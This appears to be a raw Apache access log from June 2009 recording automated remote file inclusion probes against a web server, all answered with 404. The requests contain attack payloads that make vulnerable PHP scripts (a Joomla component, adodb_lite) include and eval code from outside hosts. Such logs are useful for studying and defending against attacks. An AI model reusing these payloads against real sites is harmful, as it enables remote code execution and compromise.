216.17.99.13 - - [28/Jun/2009:05:59:23 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:59:23 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:59:25 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:59:57 -0400] "GET /logs/access_log.Q109062200/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:06:00:05 -0400] "GET /logs/access_log.Q109062300/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:06:00:19 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
